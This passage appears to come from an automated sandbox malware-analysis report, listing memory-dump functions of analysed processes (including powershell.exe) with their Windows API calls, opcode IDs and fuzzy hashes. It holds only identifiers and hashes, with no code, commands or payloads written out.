                                                    • Instruction Fuzzy Hash: 7401F276A01780CFEB10DF19DD857A6FBA4EF00220F08C0ABDC098B646D276A844CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029F07F7, Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2124251587.00000000029F0000.00000040.00000040.sdmp, Offset: 029F0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d483d15854d7a6c862cc6adb07aaab79c457fa4355fac8d13caffa8650d64321
                                                    • Instruction ID: fe1de9c37ca2c9e59a6d33315d4876894b251063d304ba23e4148c9230683e3d
                                                    • Opcode Fuzzy Hash: d483d15854d7a6c862cc6adb07aaab79c457fa4355fac8d13caffa8650d64321
                                                    • Instruction Fuzzy Hash: AF0186B6509380AFD711CF16DC45862FFB8EF86670749C19FEC898B612D225A905CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 05710861, Relevance: .0, Instructions: 39COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2134898927.0000000005710000.00000040.00000001.sdmp, Offset: 05710000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3fdc81f1f62fd2070f11e48f257519ca2a4feefceccda7f3cab169f795b64d35
                                                    • Instruction ID: f44a2178dd3ff9197a80d49d4da0ea6627838377e1e9653d705a87e1fda9d4d9
                                                    • Opcode Fuzzy Hash: 3fdc81f1f62fd2070f11e48f257519ca2a4feefceccda7f3cab169f795b64d35
                                                    • Instruction Fuzzy Hash: CBF02E3120C3D25FC3068768DCA49957BB29E8712435942DBD455CF1D6CB24584BC3F6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029F081E, Relevance: .0, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2124251587.00000000029F0000.00000040.00000040.sdmp, Offset: 029F0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4794fd04498b9f65f6502b3c4fa6872c0067dc59b773071ab808948a100141eb
                                                    • Instruction ID: 8e7e21542a6e4ec378185749e7c3ed7cc8a6b98d01145b24f444173703d6e147
                                                    • Opcode Fuzzy Hash: 4794fd04498b9f65f6502b3c4fa6872c0067dc59b773071ab808948a100141eb
                                                    • Instruction Fuzzy Hash: B1E09276A007008BD750CF0BEC41452F794EB84A30B18C17FDC4D8B700D239B504CAA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01F123F4, Relevance: .0, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120159192.0000000001F12000.00000040.00000001.sdmp, Offset: 01F12000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 63424a90bdde8db31b10d1244b22e383e7d3b491a0b12a39fb3801a42e7d06a2
                                                    • Instruction ID: 15ee018bdf7540a60458f909b41613fafb23931dd3e05781057892077dca8a67
                                                    • Opcode Fuzzy Hash: 63424a90bdde8db31b10d1244b22e383e7d3b491a0b12a39fb3801a42e7d06a2
                                                    • Instruction Fuzzy Hash: B5D05E79644A818FE7168A1CC1A4B953BE4AF55B04F5644F9E840CB6A7C769F581D200
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01F123BC, Relevance: .0, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120159192.0000000001F12000.00000040.00000001.sdmp, Offset: 01F12000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 313a42c5cb403a3ae1a7185e03817e3ea6f1a1f152fca2cb080ba018ee3e9c07
                                                    • Instruction ID: 1f64d884b1bd3cfa1a21ea6a4ae9dbe45e8d3adb7377695af5e862b426a5bc4a
                                                    • Opcode Fuzzy Hash: 313a42c5cb403a3ae1a7185e03817e3ea6f1a1f152fca2cb080ba018ee3e9c07
                                                    • Instruction Fuzzy Hash: 74D05E347006818FEB15CA1CC194F5977E4AF40700F1644E8BC008B26AC7A5E880D600
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Analysis Process: powershell.exe PID: 2772 Parent PID: 2336 powershell.exeCOMMON

                                                    Executed Functions

                                                    Function 0209ACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0209AD37
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    • Opcode ID: 4a3f24c9276521123fd95cdcf45b3ed059ae311131c47928735143b55bcf534b
                                                    • Instruction ID: 69bb5fe569bd93fab1dd3145337adc3c773bc66c9e4d3fa7a1cf7efa11808353
                                                    • Opcode Fuzzy Hash: 4a3f24c9276521123fd95cdcf45b3ed059ae311131c47928735143b55bcf534b
                                                    • Instruction Fuzzy Hash: 7C2191755097849FDB138F25DC44B92BFF4EF06210F08859AE9858F563D3719908DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0209ACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0209AD37
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    • Opcode ID: f200bd14cf93260f32801b63431a422dc9e82f84cebcc77f5f820a7b8933f026
                                                    • Instruction ID: 107a8c3193202785d67f51807ab5d61f18a052ef6bc72669e69c79ab00f6fe0d
                                                    • Opcode Fuzzy Hash: f200bd14cf93260f32801b63431a422dc9e82f84cebcc77f5f820a7b8933f026
                                                    • Instruction Fuzzy Hash: 4211A075601700DFEF21CF59D884B56FBE4EF04221F08C46AED4A8B622D731E418EB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0209B2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0209B329
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: 73dcd641ac65aff859ba561c1097d80961f5a4ab62ccb40178a88c98467e5253
                                                    • Instruction ID: 09253bd4e46afea406562f6334491fa1de3beb247f1fef5357572e9d84eb22d6
                                                    • Opcode Fuzzy Hash: 73dcd641ac65aff859ba561c1097d80961f5a4ab62ccb40178a88c98467e5253
                                                    • Instruction Fuzzy Hash: BD11A071508380AFDB22CF11DC85F52FFB4EF06224F09C49AED894B662D375A818DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0209B2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0209B329
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: fa4e04dd01bd5ee57bfc07368aa762b0855add46388c3165fb20d3e8b2440a33
                                                    • Instruction ID: 4a5e45bea51da6ac79957c2f2f32c3d736dfde805e8bd6d59b45a0e40f3ecd9f
                                                    • Opcode Fuzzy Hash: fa4e04dd01bd5ee57bfc07368aa762b0855add46388c3165fb20d3e8b2440a33
                                                    • Instruction Fuzzy Hash: 86018B31500740DFEF21CF05E885B25FBA0EF08624F08C19ADD8A0AA12D371A418EB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02770118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 027701D0
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    • Opcode ID: 1b4d26f6d787e9384a9f5b79e33bbe6291eebecc002ff789cc368d390f00736a
                                                    • Instruction ID: d60d513856af7b40d3284946179cb93f872a8485a33df7e524e298062d1d2bc0
                                                    • Opcode Fuzzy Hash: 1b4d26f6d787e9384a9f5b79e33bbe6291eebecc002ff789cc368d390f00736a
                                                    • Instruction Fuzzy Hash: A731396650E3C08FEB138B759C65692BFB4AF07210F0E84DBD884CF1A3D6259809DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0277067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0277072D
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 0a06fd6f7b6b7099cc8ba8357f1313061ddb213f698a7fc0e63514d9ff5daf7e
                                                    • Instruction ID: a38cd2b53b021c7a6e36b7a819402ffe5c0fd62870d33262af7a6925c1ceed75
                                                    • Opcode Fuzzy Hash: 0a06fd6f7b6b7099cc8ba8357f1313061ddb213f698a7fc0e63514d9ff5daf7e
                                                    • Instruction Fuzzy Hash: CC318371504380AFEB22CF65DC85F52BFF8EF05210F09849EE9858B292D375E808CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02770D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 02770DD6
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    • Opcode ID: 11eb3559b7d900d69bf62ceb36c37dabc995000efb03676426a52f6bddcabc7d
                                                    • Instruction ID: 2c4c2d75d461448713916d3245ae73cdf73af75db4dd3834e2b177cfd400e947
                                                    • Opcode Fuzzy Hash: 11eb3559b7d900d69bf62ceb36c37dabc995000efb03676426a52f6bddcabc7d
                                                    • Instruction Fuzzy Hash: C6319871509384AFE712CB25DC45B96BFE8DF06214F0884AAE984DF293D375A909CB72
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0209BD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,71D427D5,00000000,00000000,00000000,00000000), ref: 0209BDBC
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    • Opcode ID: f9aa71b9ad30ce1e1cd6683a9210dbec3bc235f76ad0931f920f49d4b245f01a
                                                    • Instruction ID: 06b9efb9f8c70c2612a716569398d15e6c02f0e32a850b236a489443eb55da18
                                                    • Opcode Fuzzy Hash: f9aa71b9ad30ce1e1cd6683a9210dbec3bc235f76ad0931f920f49d4b245f01a
                                                    • Instruction Fuzzy Hash: 0531C571109380AFEB12CB61DC45F96BFBCEF06210F0885DBF985DB192D224A908C771
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0209AF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,71D427D5,00000000,00000000,00000000,00000000), ref: 0209AFBE
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    • Opcode ID: f555770c496750f18eea85e76eff0d4baa49323bfb63849a6ab5ede6211109f8
                                                    • Instruction ID: 05a89c671b52355aecb37706d08f8b76d9bbe8991d905289fb42d1ba4c97a9d4
                                                    • Opcode Fuzzy Hash: f555770c496750f18eea85e76eff0d4baa49323bfb63849a6ab5ede6211109f8
                                                    • Instruction Fuzzy Hash: 8B21D5B2509380AFEB12CB20DC45B96BFB8EF06320F0884DAE985DB193D2259949D761
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02770FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0277109E
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    • Opcode ID: 244a99305c72f1d98e9d27789869cfb1e18d182deb7720f86be609ff1e3288e0
                                                    • Instruction ID: ade11223e62b9075b6b65ea593a973acccbd5a1047fc19a5e7994e816e016bf0
                                                    • Opcode Fuzzy Hash: 244a99305c72f1d98e9d27789869cfb1e18d182deb7720f86be609ff1e3288e0
                                                    • Instruction Fuzzy Hash: 1131917550E3C06FD3138B358C55B56BFB4AF43610F1A81DBD884CF2A3D228A909C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0209B01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,71D427D5,00000000,00000000,00000000,00000000), ref: 0209B0AE
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    • Opcode ID: 423bcd1b9818e7122fa4def11dcd04b829bcd287d3705c6090df797bd24c33d8
                                                    • Instruction ID: 74c27637e8924ebb1346dc935e95bfadcf662e2e46b2b795d663a0bd6f5e020f
                                                    • Opcode Fuzzy Hash: 423bcd1b9818e7122fa4def11dcd04b829bcd287d3705c6090df797bd24c33d8
                                                    • Instruction Fuzzy Hash: 4621D371505380AFEB22CF11DC44FA6BFB8EF46220F08849AE945DB152D764E908CB71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0209A1A8, Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • EnumWindows.USER32(?,00000E9C,?,?), ref: 0209A23E
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumWindows
                                                    • String ID:
                                                    • API String ID: 1129996299-0
                                                    • Opcode ID: 709969c9f64578378557f2a214a0b619d28d50fcd8dc7e66506a8e6acce16dfa
                                                    • Instruction ID: 4c24af5cd78accb7764fd7989d50f38998a14ea4243ee22bb2547cc6663ebc8d
                                                    • Opcode Fuzzy Hash: 709969c9f64578378557f2a214a0b619d28d50fcd8dc7e66506a8e6acce16dfa
                                                    • Instruction Fuzzy Hash: 4121B27190D3C06FD3128B258C55B66BFB4EF47620F1981DBD8848F693D329A919CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02770784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,71D427D5,00000000,00000000,00000000,00000000), ref: 02770819
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: 7135e88e99bc0ea63b1563220a9bb2a4cbe350ece13cffc3b5d8e146eb3b8365
                                                    • Instruction ID: 35dab866d92c40d72b1c744d16c2f87556516b54de0513f638078f1729dd23dc
                                                    • Opcode Fuzzy Hash: 7135e88e99bc0ea63b1563220a9bb2a4cbe350ece13cffc3b5d8e146eb3b8365
                                                    • Instruction Fuzzy Hash: 4521CBB5508780AFE712CB159C45BA3BFA8EF46720F0981DAFD859B153D2246909C771
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02770464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02770502
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    • Opcode ID: 66b2995bdd46d3f1eaf84e98ae2d76aeb473ed38add6a36c5fc4afee3bc651dc
                                                    • Instruction ID: 7051852e14676d16761247f84c26c2afe27d0aaeb783781ccaa0e3c3533af4ec
                                                    • Opcode Fuzzy Hash: 66b2995bdd46d3f1eaf84e98ae2d76aeb473ed38add6a36c5fc4afee3bc651dc
                                                    • Instruction Fuzzy Hash: F2217F7550E3C0AFD3128B359C55B62BFB4EF47610F1A81CBD8848F693D225A919C7B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027706AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0277072D
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 4b423c76c6861b02eaea448d373c21ad5d56a851ca2ccb5a114bf8ab8b370279
                                                    • Instruction ID: 3d96ed9461695931e285f06db1ec35b63d0b8a2425126d40d50fca0229f58fe3
                                                    • Opcode Fuzzy Hash: 4b423c76c6861b02eaea448d373c21ad5d56a851ca2ccb5a114bf8ab8b370279
                                                    • Instruction Fuzzy Hash: DA21B071500304EFEB20DF65DC85F66FBE8EF08250F04846AED899B691D371E808CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02770854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,71D427D5,00000000,00000000,00000000,00000000), ref: 027708E5
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: a6861298a23e1915872047f87386d8378b829ab674046908f0df34fc83122af8
                                                    • Instruction ID: a5f42c3c7815e90c8e688ea85f338980f0dce706ad6d296b50ccbd48627d1e5d
                                                    • Opcode Fuzzy Hash: a6861298a23e1915872047f87386d8378b829ab674046908f0df34fc83122af8
                                                    • Instruction Fuzzy Hash: 2421B271409380AFEB22CF21DC45F56BFB8EF06310F09849BE9849B153C225A909CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0209A8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 0209A94A
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    • Opcode ID: 67232ad10f9e9ecdf1b56e3266ec9bc984c10fbafdc48c7bd288992a4dda4c96
                                                    • Instruction ID: bf56c403cd4c4b2caa539491391eabca46e25463fc20f2853ae9a06f25d3c577
                                                    • Opcode Fuzzy Hash: 67232ad10f9e9ecdf1b56e3266ec9bc984c10fbafdc48c7bd288992a4dda4c96
                                                    • Instruction Fuzzy Hash: F2219575509780AFD3138B259C51B62BFB4EF87620F0981DBEC848B653D224A919C7B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02770D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 02770DD6
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    • Opcode ID: 155f9f642dc71871fbde120793a067432560b12865c46e0d4a118f4e67cb7141
                                                    • Instruction ID: ee53cf0bb8e265e9e9372f7fddf1d2fa9431c84ee65941438321e3bac8f98581
                                                    • Opcode Fuzzy Hash: 155f9f642dc71871fbde120793a067432560b12865c46e0d4a118f4e67cb7141
                                                    • Instruction Fuzzy Hash: A9219F71600340AFEB20DB25DC85BA6FBD8EF04210F04846AEC48DB282D775E904CA61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0209BD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,71D427D5,00000000,00000000,00000000,00000000), ref: 0209BDBC
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    • Opcode ID: 98d47f2677ecc70102a76c5c8577fe800252201ef15d537c5b89f36f11ea8d20
                                                    • Instruction ID: 1e6649e7edb8ac8be44efb0ce2bb8d1c076e0c7b8ef2fb114484357f884cf7bd
                                                    • Opcode Fuzzy Hash: 98d47f2677ecc70102a76c5c8577fe800252201ef15d537c5b89f36f11ea8d20
                                                    • Instruction Fuzzy Hash: 4F119D72500304EFEB21DF55DC85FAAFBECEF04324F04856AFD469A541E670A9489BB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0209B04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,71D427D5,00000000,00000000,00000000,00000000), ref: 0209B0AE
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    • Opcode ID: a832c46319579cf50d6c6b93b9f367ff1c73512c96c3a980607e8db9cab94384
                                                    • Instruction ID: 7db59597a982415ad1cb07eca90d07aae8edd4dbd4cf527a1d2b3bc7b9e19b67
                                                    • Opcode Fuzzy Hash: a832c46319579cf50d6c6b93b9f367ff1c73512c96c3a980607e8db9cab94384
                                                    • Instruction Fuzzy Hash: 9611AF71600304EFEB21CF15DC85FAABBE8EF44264F04846AED46CB641D770E9089A61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0277137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    • Opcode ID: 542fe02cf21f72c2bd533d665accb276a555eb04cc6fd6557a5e441c72bf01ae
                                                    • Instruction ID: b0d73c2139cbf5f69a6d5f5dc70200a62b42047bb6d564238d1ba22b7613487e
                                                    • Opcode Fuzzy Hash: 542fe02cf21f72c2bd533d665accb276a555eb04cc6fd6557a5e441c72bf01ae
                                                    • Instruction Fuzzy Hash: 072192725043809FDB21CF25DC45B96FFB4EF06220F0884AAED858B562D335A448DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02770F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 02770FB0
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    • Opcode ID: b3b4b50e8179bb70268d95ecaa41ad47b309a4e24819b08fe2a19855e8ac2bb2
                                                    • Instruction ID: 36025dfd32fb128c5d7786dc907232e7c09e3b6c7d6b2712105823611e72d0ae
                                                    • Opcode Fuzzy Hash: b3b4b50e8179bb70268d95ecaa41ad47b309a4e24819b08fe2a19855e8ac2bb2
                                                    • Instruction Fuzzy Hash: 0D2149715093C49FDB12CB25DC55B92BFA4AF07224F0984DAE8888F693D2659808CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0209AAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0209AB1A
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: cab023c4baa135a91c3462a94eafaf049140e517c8e7b1f0769859ac22c9bc9b
                                                    • Instruction ID: 8ce1f1e762d0cc732f1f925d3db8cafb250530e81bbccfd0892ef325ca838d96
                                                    • Opcode Fuzzy Hash: cab023c4baa135a91c3462a94eafaf049140e517c8e7b1f0769859ac22c9bc9b
                                                    • Instruction Fuzzy Hash: 952172716053809FDB22CF25DC44B52BFF8EF46214F0884AAED89DB653E365E408DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0209BABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleScreenBufferInfo.KERNEL32 ref: 0209BB2F
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2121174580.000000000209A000.00000040.00000001.sdmp, Offset: 0209A000, based on PE: false
                                                    Similarity
                                                    • API ID: BufferConsoleInfoScreen
                                                    • String ID:
                                                    • API String ID: 3437242342-0
                                                    • Opcode ID: 5ee4a60f678694fcec9808c1cc3c86364d09a8bef6107f8acf7029900b076b7b
                                                    • Instruction ID: 4543caee92ab79bfd674e264d23ba1154b77a8ee97bdf2b18e4bb9b7c7ead546
                                                    • Opcode Fuzzy Hash: 5ee4a60f678694fcec9808c1cc3c86364d09a8bef6107f8acf7029900b076b7b
                                                    • Instruction Fuzzy Hash: C4219F725093C09FEB12CB25DC55B92BFF4EF07220F0984DADD858F2A3D264A948DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027710D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 02771148
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2124443553.0000000002770000.00000040.00000001.sdmp, Offset: 02770000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    • Opcode ID: b158e6a5319a693454b6aeb090e765718e227b73cc72a53d0a18cab14b4a9bd9
                                                    • Instruction ID: a81bc88cb0a7421c8f182f837d4af42aded8163f75a6752532129bd3933f5a1b
                                                    • Opcode Fuzzy Hash: b158e6a5319a693454b6aeb090e765718e227b73cc72a53d0a18cab14b4a9bd9
                                                    • Instruction Fuzzy Hash: 5B216D6140D3C49FD7138B259C54A62BFB4EF57620F0980DBDCC58F2A3D2695808D772
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0209AF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
